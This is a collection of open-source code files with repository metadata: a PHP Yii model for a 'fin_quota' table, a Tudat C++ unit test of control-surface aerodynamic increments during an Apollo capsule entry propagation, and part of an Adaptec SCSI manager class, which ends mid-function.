virtual void killExecutor(Framework *framework) = 0;
// Update the resource limits for a given framework. This method will
// be called only after an executor for the framework is started.
virtual void resourcesChanged(Framework *framework) {}
};
}}}
#endif /* __ISOLATION_MODULE_HPP__ */
| benh/twesos | src/slave/isolation_module.hpp | C++ | bsd-3-clause | 992 |
<?php
namespace frontend\models\money;
use Yii;
/**
* This is the model class for table "fin_quota".
*
* @property integer $quota_id
* @property integer $user_id
* @property string $quota_amount
* @property string $quota_desc
* @property integer $quota_status
* @property integer $addtime
*/
class Quota extends \yii\db\ActiveRecord
{
/**
* @inheritdoc
*/
public static function tableName()
{
return 'fin_quota';
}
/**
* @inheritdoc
*/
public function rules()
{
return [
[['user_id', 'quota_status', 'addtime'], 'integer'],
[['quota_amount'], 'number'],
[['quota_desc'], 'string', 'max' => 80]
];
}
/**
* @inheritdoc
*/
public function attributeLabels()
{
return [
'quota_id' => 'Quota ID',
'user_id' => 'User ID',
'quota_amount' => 'Quota Amount',
'quota_desc' => 'Quota Desc',
'quota_status' => 'Quota Status',
'addtime' => 'Addtime',
];
}
}
| wangpengzhen/web | frontend/models/money/Quota.php | PHP | bsd-3-clause | 1,084 |
/* Copyright (c) 2010-2018, Delft University of Technology
* All rigths reserved
*
* This file is part of the Tudat. Redistribution and use in source and
* binary forms, with or without modification, are permitted exclusively
* under the terms of the Modified BSD license. You should have received
* a copy of the license with this file. If not, please or visit:
* http://tudat.tudelft.nl/LICENSE.
*/
#define BOOST_TEST_MAIN
#include <boost/array.hpp>
#include <boost/make_shared.hpp>
#include <memory>
#include <boost/test/floating_point_comparison.hpp>
#include <boost/test/unit_test.hpp>
#include <Eigen/Core>
#include "Tudat/Mathematics/BasicMathematics/mathematicalConstants.h"
#include "Tudat/Astrodynamics/Aerodynamics/hypersonicLocalInclinationAnalysis.h"
#include "Tudat/Astrodynamics/Aerodynamics/customAerodynamicCoefficientInterface.h"
#include "Tudat/Basics/basicTypedefs.h"
#include "Tudat/Mathematics/GeometricShapes/capsule.h"
#include "Tudat/Mathematics/GeometricShapes/sphereSegment.h"
#include "Tudat/SimulationSetup/tudatSimulationHeader.h"
#include "Tudat/Astrodynamics/Aerodynamics/UnitTests/testApolloCapsuleCoefficients.h"
namespace tudat
{
namespace unit_tests
{
//! Dummy class used to test the use of control surface deflections in numerical propagation.
//! In this class, a single control surface named "TestSurface" is set to a time-dependent deflection at each time step,
//! as is the angle of attack. The update is performed by the AerodynamicAngleCalculator, as linked by this class'
//! constructor
class DummyGuidanceSystem
{
public:
DummyGuidanceSystem(
const std::function< void( const std::string&, const double ) > controlSurfaceFunction,
const std::shared_ptr< reference_frames::AerodynamicAngleCalculator > angleCalculator ):
controlSurfaceFunction_( controlSurfaceFunction ), angleCalculator_( angleCalculator ),
currentAngleOfAttack_( 0.0 ), currentSurfaceDeflection_( 0.0 )
{
angleCalculator_->setOrientationAngleFunctions(
std::bind( &DummyGuidanceSystem::getCurrentAngleOfAttack, this ),
std::function< double( ) >( ),
std::function< double( ) >( ),
std::bind( &DummyGuidanceSystem::updateGuidance, this, std::placeholders::_1 ) );
controlSurfaceFunction_( "TestSurface", 0.2 );
}
~DummyGuidanceSystem( ){ }
void updateGuidance( const double currentTime )
{
currentAngleOfAttack_ = 0.3 * ( 1.0 - currentTime / 1000.0 );
currentSurfaceDeflection_ = -0.02 + 0.04 * currentTime / 1000.0;
controlSurfaceFunction_( "TestSurface", currentSurfaceDeflection_ );
}
double getCurrentAngleOfAttack( )
{
return currentAngleOfAttack_;
}
double getCurrentSurfaceDeflection( )
{
return currentSurfaceDeflection_;
}
private:
std::function< void( const std::string&, const double ) > controlSurfaceFunction_;
std::shared_ptr< reference_frames::AerodynamicAngleCalculator > angleCalculator_;
double currentAngleOfAttack_;
double currentSurfaceDeflection_;
};
using Eigen::Vector6d;
using mathematical_constants::PI;
BOOST_AUTO_TEST_SUITE( test_control_surface_increments )
//! Function to return dummy control increments as a function of 2 independnt variables
Eigen::Vector6d dummyControlIncrements(
const std::vector< double > independentVariables )
{
Eigen::Vector6d randomControlIncrements =
( Eigen::Vector6d( ) << 1.0, -3.5, 2.1, 0.4, -0.75, 1.3 ).finished( );
for( unsigned int i = 0; i < 6; i++ )
{
randomControlIncrements( i ) *= (
0.01 * independentVariables.at( 0 ) + static_cast< double >( i ) * 0.005 * independentVariables.at( 1 ) );
}
BOOST_CHECK_EQUAL( independentVariables.size( ), 2 );
return randomControlIncrements;
}
//! Test update and retrieval of control surface aerodynamic coefficient increments, outside of the numerical propagation
BOOST_AUTO_TEST_CASE( testControlSurfaceIncrementInterface )
{
// Create aerodynamic coefficient interface without control increments.
std::shared_ptr< AerodynamicCoefficientInterface > coefficientInterfaceWithoutIncrements =
getApolloCoefficientInterface( );
// Create aerodynamic coefficient interface with control increments.
std::shared_ptr< AerodynamicCoefficientInterface > coefficientInterfaceWithIncrements =
getApolloCoefficientInterface( );
std::shared_ptr< ControlSurfaceIncrementAerodynamicInterface > controlSurfaceInterface =
std::make_shared< CustomControlSurfaceIncrementAerodynamicInterface >(
&dummyControlIncrements,
std::vector< AerodynamicCoefficientsIndependentVariables >{ angle_of_attack_dependent, control_surface_deflection_dependent } );
std::map< std::string, std::shared_ptr< ControlSurfaceIncrementAerodynamicInterface > > controlSurfaceList;
controlSurfaceList[ "TestSurface" ] = controlSurfaceInterface;
coefficientInterfaceWithIncrements->setControlSurfaceIncrements( controlSurfaceList );
// Define values of independent variables of body aerodynamics
std::vector< double > independentVariables;
independentVariables.push_back( 10.0 );
independentVariables.push_back( 0.1 );
independentVariables.push_back( -0.01 );
// Define values of independent variables of control surface aerodynamics
std::map< std::string, std::vector< double > > controlSurfaceIndependentVariables;
controlSurfaceIndependentVariables[ "TestSurface" ].push_back( 0.1 );
controlSurfaceIndependentVariables[ "TestSurface" ].push_back( 0.0 );
// Declare test variables.
Eigen::Vector3d forceWithIncrement, forceWithoutIncrement;
Eigen::Vector3d momentWithIncrement, momentWithoutIncrement;
Eigen::Vector6d manualControlIncrements;
// Test coefficient interfaces for range of independent variables.
for( double angleOfAttack = -0.4; angleOfAttack < 0.4; angleOfAttack += 0.02 )
{
for( double deflectionAngle = -0.05; deflectionAngle < 0.05; deflectionAngle += 0.001 )
{
// Set indepdnent variables.
controlSurfaceIndependentVariables[ "TestSurface" ][ 0 ] = angleOfAttack;
controlSurfaceIndependentVariables[ "TestSurface" ][ 1 ] = deflectionAngle;
independentVariables[ 1 ] = angleOfAttack;
// Update coefficients
coefficientInterfaceWithoutIncrements->updateFullCurrentCoefficients(
independentVariables );
coefficientInterfaceWithIncrements->updateFullCurrentCoefficients(
independentVariables, controlSurfaceIndependentVariables );
// Retrieve coefficients.
forceWithIncrement = coefficientInterfaceWithIncrements->getCurrentForceCoefficients( );
forceWithoutIncrement = coefficientInterfaceWithoutIncrements->getCurrentForceCoefficients( );
momentWithIncrement = coefficientInterfaceWithIncrements->getCurrentMomentCoefficients( );
momentWithoutIncrement = coefficientInterfaceWithoutIncrements->getCurrentMomentCoefficients( );
// Test coefficients
manualControlIncrements = dummyControlIncrements( controlSurfaceIndependentVariables[ "TestSurface" ] );
for( unsigned int i = 0; i < 3; i++ )
{
BOOST_CHECK_SMALL( std::fabs( forceWithIncrement( i ) -
forceWithoutIncrement( i ) - manualControlIncrements( i ) ), 1.0E-14 );
BOOST_CHECK_SMALL( std::fabs( momentWithIncrement( i ) -
momentWithoutIncrement( i ) - manualControlIncrements( i + 3 ) ), 1.0E-14 );
}
}
}
}
//! Test use of control surface deflections in a full numerical propagation, with a dummy (e.g. non-physical) model
//! for aerodynamic and control surface guidance. Test case uses Apollo capsule entry and coefficients.
BOOST_AUTO_TEST_CASE( testControlSurfaceIncrementInterfaceInPropagation )
{
using namespace tudat;
using namespace ephemerides;
using namespace interpolators;
using namespace numerical_integrators;
using namespace spice_interface;
using namespace simulation_setup;
using namespace basic_astrodynamics;
using namespace orbital_element_conversions;
using namespace propagators;
using namespace aerodynamics;
using namespace basic_mathematics;
using namespace input_output;
// Load Spice kernels.
spice_interface::loadStandardSpiceKernels( );
// Set simulation start epoch.
const double simulationStartEpoch = 0.0;
// Set simulation end epoch.
const double simulationEndEpoch = 3300.0;
// Set numerical integration fixed step size.
const double fixedStepSize = 1.0;
// Set initial Keplerian elements for vehicle.
Vector6d apolloInitialStateInKeplerianElements;
apolloInitialStateInKeplerianElements( semiMajorAxisIndex ) = spice_interface::getAverageRadius( "Earth" ) + 120.0E3;
apolloInitialStateInKeplerianElements( eccentricityIndex ) = 0.005;
apolloInitialStateInKeplerianElements( inclinationIndex ) = unit_conversions::convertDegreesToRadians( 85.3 );
apolloInitialStateInKeplerianElements( argumentOfPeriapsisIndex )
= unit_conversions::convertDegreesToRadians( 235.7 );
apolloInitialStateInKeplerianElements( longitudeOfAscendingNodeIndex )
= unit_conversions::convertDegreesToRadians( 23.4 );
apolloInitialStateInKeplerianElements( trueAnomalyIndex ) = unit_conversions::convertDegreesToRadians( 139.87 );
// Convert apollo state from Keplerian elements to Cartesian elements.
const Vector6d apolloInitialState = convertKeplerianToCartesianElements(
apolloInitialStateInKeplerianElements,
getBodyGravitationalParameter( "Earth" ) );
// Define simulation body settings.
std::map< std::string, std::shared_ptr< BodySettings > > bodySettings =
getDefaultBodySettings( { "Earth", "Moon" }, simulationStartEpoch - 10.0 * fixedStepSize,
simulationEndEpoch + 10.0 * fixedStepSize );
bodySettings[ "Earth" ]->gravityFieldSettings =
std::make_shared< simulation_setup::GravityFieldSettings >( central_spice );
// Create Earth object
simulation_setup::NamedBodyMap bodyMap = simulation_setup::createBodies( bodySettings );
// Create vehicle objects.
bodyMap[ "Apollo" ] = std::make_shared< simulation_setup::Body >( );
// Create vehicle aerodynamic coefficients
bodyMap[ "Apollo" ]->setAerodynamicCoefficientInterface(
unit_tests::getApolloCoefficientInterface( ) );
std::shared_ptr< ControlSurfaceIncrementAerodynamicInterface > controlSurfaceInterface =
std::make_shared< CustomControlSurfaceIncrementAerodynamicInterface >(
&dummyControlIncrements,
std::vector< AerodynamicCoefficientsIndependentVariables >{ angle_of_attack_dependent, control_surface_deflection_dependent } );
std::map< std::string, std::shared_ptr< ControlSurfaceIncrementAerodynamicInterface > > controlSurfaceList;
controlSurfaceList[ "TestSurface" ] = controlSurfaceInterface;
bodyMap[ "Apollo" ]->getAerodynamicCoefficientInterface( )->setControlSurfaceIncrements( controlSurfaceList );
bodyMap[ "Apollo" ]->setConstantBodyMass( 5.0E3 );
bodyMap[ "Apollo" ]->setEphemeris(
std::make_shared< ephemerides::TabulatedCartesianEphemeris< > >(
std::shared_ptr< interpolators::OneDimensionalInterpolator< double, Eigen::Vector6d > >( ),
"Earth" ) );
std::shared_ptr< system_models::VehicleSystems > apolloSystems = std::make_shared< system_models::VehicleSystems >( );
bodyMap[ "Apollo" ]->setVehicleSystems( apolloSystems );
// Finalize body creation.
setGlobalFrameBodyEphemerides( bodyMap, "SSB", "ECLIPJ2000" );
// Define propagator settings variables.
SelectedAccelerationMap accelerationMap;
std::vector< std::string > bodiesToPropagate;
std::vector< std::string > centralBodies;
// Define acceleration model settings.
std::map< std::string, std::vector< std::shared_ptr< AccelerationSettings > > > accelerationsOfApollo;
accelerationsOfApollo[ "Earth" ].push_back( std::make_shared< AccelerationSettings >( central_gravity ) );
accelerationsOfApollo[ "Earth" ].push_back( std::make_shared< AccelerationSettings >( aerodynamic ) );
accelerationsOfApollo[ "Moon" ].push_back( std::make_shared< AccelerationSettings >( central_gravity ) );
accelerationMap[ "Apollo" ] = accelerationsOfApollo;
bodiesToPropagate.push_back( "Apollo" );
centralBodies.push_back( "Earth" );
// Set initial state
Eigen::Vector6d systemInitialState = apolloInitialState;
// Define list of dependent variables to save.
std::vector< std::shared_ptr< SingleDependentVariableSaveSettings > > dependentVariables;
dependentVariables.push_back(
std::make_shared< SingleDependentVariableSaveSettings >(
mach_number_dependent_variable, "Apollo" ) );
dependentVariables.push_back(
std::make_shared< BodyAerodynamicAngleVariableSaveSettings >(
"Apollo", reference_frames::angle_of_attack ) );
dependentVariables.push_back(
std::make_shared< BodyAerodynamicAngleVariableSaveSettings >(
"Apollo", reference_frames::angle_of_sideslip ) );
dependentVariables.push_back(
std::make_shared< SingleDependentVariableSaveSettings >(
control_surface_deflection_dependent_variable, "Apollo", "TestSurface" ) );
dependentVariables.push_back(
std::make_shared< SingleDependentVariableSaveSettings >(
aerodynamic_moment_coefficients_dependent_variable, "Apollo" ) );
dependentVariables.push_back(
std::make_shared< SingleDependentVariableSaveSettings >(
aerodynamic_force_coefficients_dependent_variable, "Apollo" ) );
// Create acceleration models
basic_astrodynamics::AccelerationMap accelerationModelMap = createAccelerationModelsMap(
bodyMap, accelerationMap, bodiesToPropagate, centralBodies );
// Set update function for body orientation and control surface deflections
std::shared_ptr< DummyGuidanceSystem > dummyGuidanceSystem = std::make_shared< DummyGuidanceSystem >(
std::bind( &system_models::VehicleSystems::setCurrentControlSurfaceDeflection, apolloSystems, std::placeholders::_1, std::placeholders::_2 ),
bodyMap[ "Apollo" ]->getFlightConditions( )->getAerodynamicAngleCalculator( ) );
// Create propagation and integrtion settings.
std::shared_ptr< TranslationalStatePropagatorSettings< double > > propagatorSettings =
std::make_shared< TranslationalStatePropagatorSettings< double > >
( centralBodies, accelerationModelMap, bodiesToPropagate, systemInitialState,
std::make_shared< propagators::PropagationTimeTerminationSettings >( 1000.0 ), cowell,
std::make_shared< DependentVariableSaveSettings >( dependentVariables ) );
std::shared_ptr< IntegratorSettings< > > integratorSettings =
std::make_shared< IntegratorSettings< > >
( rungeKutta4, simulationStartEpoch, fixedStepSize );
// Create simulation object and propagate dynamics.
SingleArcDynamicsSimulator< > dynamicsSimulator(
bodyMap, integratorSettings, propagatorSettings, true, false, false );
// Retrieve numerical solutions for state and dependent variables
std::map< double, Eigen::Matrix< double, Eigen::Dynamic, 1 > > numericalSolution =
dynamicsSimulator.getEquationsOfMotionNumericalSolution( );
std::map< double, Eigen::VectorXd > dependentVariableSolution =
dynamicsSimulator.getDependentVariableHistory( );
// Declare test variables.
double currentAngleOfAttack, currentSideslipAngle, currentMachNumber, currentSurfaceDeflection, currentTime;
Eigen::Vector3d currentForceCoefficients, currentMomentCoefficients;
Eigen::Vector3d expectedForceCoefficients, expectedMomentCoefficients;
std::vector< double > currentAerodynamicsIndependentVariables;
currentAerodynamicsIndependentVariables.resize( 3 );
std::map< std::string, std::vector< double > > currentAerodynamicsControlIndependentVariables;
currentAerodynamicsControlIndependentVariables[ "TestSurface" ].resize( 2 );
// Iterate over saved variables and compare to expected values
std::shared_ptr< AerodynamicCoefficientInterface > coefficientInterface =
bodyMap[ "Apollo" ]->getAerodynamicCoefficientInterface( );
for( std::map< double, Eigen::VectorXd >::iterator variableIterator = dependentVariableSolution.begin( );
variableIterator != dependentVariableSolution.end( ); variableIterator++ )
{
// Retrieve dependent variables
currentTime = variableIterator->first;
currentMachNumber = variableIterator->second( 0 );
currentAngleOfAttack = variableIterator->second( 1 );
currentSideslipAngle = variableIterator->second( 2 );
currentSurfaceDeflection = variableIterator->second( 3 );
currentMomentCoefficients = variableIterator->second.segment( 4, 3 );
currentForceCoefficients = variableIterator->second.segment( 7, 3 );
// Test angles of attack and sideslip, and control surface deflection, against expectec values
BOOST_CHECK_SMALL( std::fabs( currentAngleOfAttack - 0.3 * ( 1.0 - currentTime / 1000.0 ) ), 1.0E-14 );
BOOST_CHECK_SMALL( std::fabs( currentSideslipAngle ), 1.0E-14 );
BOOST_CHECK_SMALL( std::fabs( currentSurfaceDeflection - ( -0.02 + 0.04 * currentTime / 1000.0 ) ), 1.0E-14 );
// Set current aerodynamic coefficient independent variables and retrieve coefficients.c.
currentAerodynamicsIndependentVariables[ 0 ] = currentMachNumber;
currentAerodynamicsIndependentVariables[ 1 ] = currentAngleOfAttack;
currentAerodynamicsIndependentVariables[ 2 ] = currentSideslipAngle;
currentAerodynamicsControlIndependentVariables[ "TestSurface" ][ 0 ] = currentAngleOfAttack;
currentAerodynamicsControlIndependentVariables[ "TestSurface" ][ 1 ] = currentSurfaceDeflection;
coefficientInterface->updateFullCurrentCoefficients(
currentAerodynamicsIndependentVariables, currentAerodynamicsControlIndependentVariables );
expectedForceCoefficients = coefficientInterface->getCurrentForceCoefficients( );
expectedMomentCoefficients = coefficientInterface->getCurrentMomentCoefficients( );
// Test expected against actual aerodynamic coefficients.
for( unsigned int i = 0; i < 3; i++ )
{
BOOST_CHECK_SMALL( std::fabs( expectedForceCoefficients( i ) - currentForceCoefficients( i ) ), 1.0E-14 );
BOOST_CHECK_SMALL( std::fabs( expectedMomentCoefficients( i ) - currentMomentCoefficients( i ) ), 1.0E-14 );
}
}
}
BOOST_AUTO_TEST_SUITE_END( )
} // namespace unit_tests
} // namespace tudat
| DominicDirkx/tudat | Tudat/Astrodynamics/Aerodynamics/UnitTests/unitTestControlSurfaceIncrements.cpp | C++ | bsd-3-clause | 19,487 |
/* Copyright (c) 1996-2004, Adaptec Corporation
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* - Redistributions of source code must retain the above copyright notice, this
* list of conditions and the following disclaimer.
* - Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* - Neither the name of the Adaptec Corporation nor the names of its
* contributors may be used to endorse or promote products derived from this
* software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*/
//File - SCSI_MGR.CPP
//***************************************************************************
//
//Description:
//
// This file contains the function definitions for the dptSCSImgr_C
//class.
//
//Author: Doug Anderson
//Date: 3/9/93
//
//Editors:
//
//Remarks:
//
//
//***************************************************************************
//Include Files -------------------------------------------------------------
#include "allfiles.hpp" // All engine include files
//Function - dptSCSImgr_C::dptSCSImgr_C() - start
//===========================================================================
//
//Description:
//
// This function is the constructor for the dptSCSImgr_C class.
//
//Parameters:
//
//Return Value:
//
//Global Variables Affected:
//
//Remarks: (Side effects, Assumptions, Warnings...)
//
//
//---------------------------------------------------------------------------
dptSCSImgr_C::dptSCSImgr_C()
{
// Every second
rbldFrequency = 90;
// 256k per burst
rbldAmount = 256 * 2;
// Clear the RAID support flags
raidSupport = 0;
// Default = 6 second delay
spinDownDelay = 6;
// Default = Do not poll for rebuilding
rbldPollFreq = 0;
// Clear the RAID rebuild flags
raidFlags = 0;
}
//dptSCSImgr_C::dptSCSImgr_C() - end
//Function - dptSCSImgr_C::preEnterLog() - start
//===========================================================================
//
//Description:
//
// This function is called prior to entering a device in this manager's
//logical device list. This function should be used to set any ownership
//flags...
//
//Parameters:
//
//Return Value:
//
//Global Variables Affected:
//
//Remarks: (Side effects, Assumptions, Warnings...)
//
//
//---------------------------------------------------------------------------
DPT_RTN_T dptSCSImgr_C::preEnterLog(dptCoreDev_C *dev_P)
{
DPT_RTN_T retVal = MSG_RTN_COMPLETED;
// Set the device's HBA to this manager's HBA
dev_P->hba_P = myHBA_P();
// Update the device's HBA #
dev_P->updateHBAnum();
// Insure the device's SCSI ID is unique
//if (!isUniqueLog(dev_P->getAddr(),0x7))
// retVal = MSG_RTN_FAILED | ERR_SCSI_ADDR_CONFLICT;
return (retVal);
}
//dptSCSImgr_C::preEnterLog() - end
//Function - dptSCSImgr_C::preEnterPhy() - start
//===========================================================================
//
//Description:
//
// This function is called prior to entering an object in this manager's
//physical object list. This function should be used to set any ownership
//flags...
//
//Parameters:
//
//Return Value:
//
//Global Variables Affected:
//
//Remarks: (Side effects, Assumptions, Warnings...)
//
//
//---------------------------------------------------------------------------
DPT_RTN_T dptSCSImgr_C::preEnterPhy(dptCoreObj_C *obj_P)
{
DPT_RTN_T retVal = MSG_RTN_COMPLETED;
dptAddr_S tempAddr;
// Cast the core object as a SCSI object
dptSCSIobj_C *scsi_P = (dptSCSIobj_C *) obj_P;
// Set the device's HBA to this manager's HBA
scsi_P->hba_P = myHBA_P();
// Update the object's HBA #
scsi_P->updateHBAnum();
tempAddr = scsi_P->getAddr();
// Insure the object's address is within the minimum bounds
//if (!phyRange.inBounds(tempAddr))
// retVal = MSG_RTN_FAILED | ERR_SCSI_ADDR_BOUNDS;
// Insure the object's SCSI ID is not equal to this manager's SCSI ID
//else if (scsi_P->getID()==getMgrPhyID())
//if (scsi_P->getID()==getMgrPhyID())
// retVal = MSG_RTN_FAILED | ERR_SCSI_ADDR_CONFLICT;
// Insure the object's SCSI ID is unique
//else if (!isUniquePhy(tempAddr,0x6))
// retVal = MSG_RTN_FAILED | ERR_SCSI_ADDR_CONFLICT;
return (retVal);
}
//dptSCSImgr_C::preEnterPhy() - end
//Function - dptSCSImgr_C::preAddLog() - start
//===========================================================================
//
//Description:
//
// This function is called prior to adding a device to this manager's
//logical device list. This function insures that the device has a
//unique SCSI address and positions the logical device list to enter
//the device in SCSI address order.
//
//Parameters:
//
//Return Value:
//
//Global Variables Affected:
//
//Remarks: (Side effects, Assumptions, Warnings...)
//
//
//---------------------------------------------------------------------------
uSHORT dptSCSImgr_C::preAddLog(dptCoreDev_C *dev_P)
{
uSHORT unique = positionSCSI(logList,dev_P->getAddr());
return (unique);
}
//dptSCSImgr_C::preAddLog() - end
//Function - dptSCSImgr_C::preAddPhy() - start
//===========================================================================
//
//Description:
//
// This function is called prior to adding an object to this manager's
//physical device list. This function insures that the device has a
//unique SCSI address and positions the physical object list to enter
//the object in SCSI address order.
//
//Parameters:
//
//Return Value:
//
//Global Variables Affected:
//
//Remarks: (Side effects, Assumptions, Warnings...)
//
//
//---------------------------------------------------------------------------
uSHORT dptSCSImgr_C::preAddPhy(dptCoreObj_C *obj_P)
{
uSHORT unique = positionSCSI(phyList,((dptSCSIobj_C *)obj_P)->getAddr());
return (unique);
}
//dptSCSImgr_C::preAddPhy() - end
//Function - dptSCSImgr_C::getNextAddr() - start
//===========================================================================
//
//Description:
//
// This function attempts to find the next available address in the
//specified list. The entire physical address range is checked.
//
//Parameters:
//
//Return Value:
//
//Global Variables Affected:
//
//Remarks: (Side effects, Assumptions, Warnings...)
//
//
//---------------------------------------------------------------------------
uSHORT dptSCSImgr_C::getNextAddr(dptCoreList_C &list,
dptAddr_S &inAddr,
uCHAR mask,
uCHAR notMyID
)
{
uSHORT found = 0;
for (phyRange.reset();!phyRange.maxedOut() && !found;
phyRange.incTopDown()) {
// Set the SCSI address
inAddr = phyRange.cur();
inAddr.hba = getHBA();
// If the address is unique...
if (isUniqueAddr(list,inAddr,mask))
if (!notMyID || (inAddr.id!=getMgrPhyID()))
found = 1;
} // end for (phyRange)
// If a unique address was not found...
if (!found) {
// Set the address to the minimum address
inAddr = phyRange.getMinAddr();
inAddr.hba = getHBA();
}
return (found);
}
//dptSCSImgr_C::getAddr() - end
//Function - dptSCSImgr_C::createArtificial() - start
//===========================================================================
//
//Description:
//
// This function creates an absent object and enters the object into
//the engine core.
//
//Parameters:
//
//Return Value:
//
//Global Variables Affected:
//
//Remarks: (Side effects, Assumptions, Warnings...)
//
//
//---------------------------------------------------------------------------
DPT_RTN_T dptSCSImgr_C::createArtificial(dptBuffer_S *fromEng_P,
dptBuffer_S *toEng_P
)
{
DPT_RTN_T retVal = MSG_RTN_DATA_UNDERFLOW;
uSHORT objType;
dptSCSIobj_C *obj_P;
// Skip the tag field
toEng_P->skip(sizeof(DPT_TAG_T));
// Read the object type
if (toEng_P->extract(&objType,sizeof(uSHORT))) {
retVal = MSG_RTN_FAILED | ERR_NEW_ARTIFICIAL;
if (isValidAbsentObj(objType)) {
// Create a new object
obj_P = (dptSCSIobj_C *) newObject(objType);
if (obj_P != NULL) {
// Reset the input buffer
toEng_P->replay();
// Attempt to set the object's data
obj_P->setInfo(toEng_P,1);
// Flag the object as artificial
obj_P->status.flags |= FLG_STAT_ARTIFICIAL;
// Add the object to this manager's list
if (enterAbs(obj_P)==MSG_RTN_COMPLETED)
// Return the new object's ID
retVal = obj_P->returnID(fromEng_P);
}
}
}
return (retVal);
}
//dptSCSImgr_C::createArtificial() - end
//Function - dptSCSImgr_C::setInfo() - start
//===========================================================================
//
//Description:
//
// This function sets SCSI manager information from the specified
//input buffer.
//
//Parameters:
//
//Return Value:
//
//Global Variables Affected:
//
//Remarks: (Side effects, Assumptions, Warnings...)
//
//
//---------------------------------------------------------------------------
DPT_RTN_T dptSCSImgr_C::setInfo(dptBuffer_S *toEng_P,uSHORT setAll)
{
DPT_RTN_T retVal = MSG_RTN_DATA_UNDERFLOW;
// Set base class information
dptSCSIobj_C::setInfo(toEng_P,setAll);
// Skip the maximum physical address supported
toEng_P->skip(sizeof(dptAddr_S));
// Skip the minimum physical address supported
toEng_P->skip(sizeof(dptAddr_S));
if (!setAll) {
// Skip the rebuild frequency
toEng_P->skip(sizeof(uSHORT));
// Skip the rebuild amount
toEng_P->skip(sizeof(uSHORT));
// Skip the RAID support flags
toEng_P->skip(sizeof(uSHORT));
// Skip the polling interval for RAID rebuilds
toEng_P->skip(sizeof(uSHORT));
// Skip the miscellaneous RAID flags
toEng_P->skip(sizeof(uSHORT));
// Skip the spinDownTime
if (toEng_P->skip(sizeof(uSHORT)))
retVal = MSG_RTN_COMPLETED;
}
else {
// Set the rebuild frequency
toEng_P->extract(rbldFrequency);
// Set the rebuild amount
toEng_P->extract(rbldAmount);
// Set the RAID support flags
toEng_P->extract(raidSupport);
// Set the polling interval for RAID rebuilds
toEng_P->extract(rbldPollFreq);
// Set the miscellaneous RAID flags
toEng_P->extract(raidFlags);
// Set the spinDownTime
if (toEng_P->extract(spinDownDelay))
retVal = MSG_RTN_COMPLETED;
}
return (retVal);
}
//dptSCSImgr_C::setInfo() - end
//Function - dptSCSImgr_C::rtnInfo() - start
//===========================================================================
//
//Description:
//
// This function returns SCSI manager information to the specified
//output buffer.
//
//Parameters:
//
//Return Value:
//
//Global Variables Affected:
//
//Remarks: (Side effects, Assumptions, Warnings...)
//
//
//---------------------------------------------------------------------------
DPT_RTN_T dptSCSImgr_C::rtnInfo(dptBuffer_S *fromEng_P)
{
DPT_RTN_T retVal = MSG_RTN_DATA_OVERFLOW;
// Return base class information
dptSCSIobj_C::rtnInfo(fromEng_P);
// Return the maximum physical address supported
fromEng_P->insert((void *)&phyRange.getMaxAddr(),sizeof(dptAddr_S));
// Return the minimum physical address supported
fromEng_P->insert((void *)&phyRange.getMinAddr(),sizeof(dptAddr_S));
// Return the rebuild freqency
fromEng_P->insert(rbldFrequency);
// Return the rebuild amount
fromEng_P->insert(rbldAmount);
// Return the RAID type support flags
fromEng_P->insert(raidSupport);
// Return the polling interval to check for rebuilds
fromEng_P->insert(rbldPollFreq);
// If partition table zapping is enabled
if (myConn_P()->isPartZap())
raidFlags &= ~FLG_PART_ZAP_DISABLED;
else
raidFlags |= FLG_PART_ZAP_DISABLED;
// Return the miscellaneous RAID flags
fromEng_P->insert(raidFlags);
// Return the failed drive spin down delay time
if (fromEng_P->insert(spinDownDelay))
retVal = MSG_RTN_COMPLETED;
return (retVal);
}
//dptSCSImgr_C::rtnInfo() - end
//Function - dptSCSImgr_C::isValidAbsentObj() - start
//===========================================================================
//
//Description:
//
// This function determines if an artificial engine object of the
//specified type can be added to this manager's device list.
//
//Parameters:
//
//Return Value:
//
//Global Variables Affected:
//
//Remarks: (Side effects, Assumptions, Warnings...)
//
//
//---------------------------------------------------------------------------
uSHORT dptSCSImgr_C::isValidAbsentObj(uSHORT objType)
{
uSHORT isValid = 0;
// If a SCSI device...
if (objType<=0xff)
// Indicate a valid artificial object type
isValid = 1;
return (isValid);
}
//dptSCSImgr_C::isValidAbsentObj() - end
//Function - dptSCSImgr_C::handleMessage() - start
//===========================================================================
//
//Description:
//
// This routine handles DPT events for the dptSCSImgr_C class.
//
//Parameters:
//
//Return Value:
//
//Global Variables Affected:
//
//Remarks: (Side effects, Assumptions, Warnings...)
//
//
//---------------------------------------------------------------------------
DPT_RTN_T dptSCSImgr_C::handleMessage(DPT_MSG_T message,
dptBuffer_S *fromEng_P,
dptBuffer_S *toEng_P
)
{
DPT_RTN_T retVal = MSG_RTN_IGNORED;
switch (message) {
// Return object IDs from this manager's physical object list
case MSG_ID_PHYSICALS:
retVal = rtnIDfromList(phyList,fromEng_P,toEng_P,0);
break;
// Return object IDs from this manager's physical object list
// and any sub-manager's logical device lists
case MSG_ID_VISIBLES:
retVal = rtnIDfromList(phyList,fromEng_P,toEng_P,OPT_TRAVERSE_LOG);
break;
// Return object IDs from this manager's physical object list
// and any sub-manager's physical object lists
case MSG_ID_ALL_PHYSICALS:
retVal = rtnIDfromList(phyList,fromEng_P,toEng_P,OPT_TRAVERSE_PHY);
break;
// Return object IDs from this manager's physical object list
// and any sub-manager's physical object lists
case MSG_ID_LOGICALS:
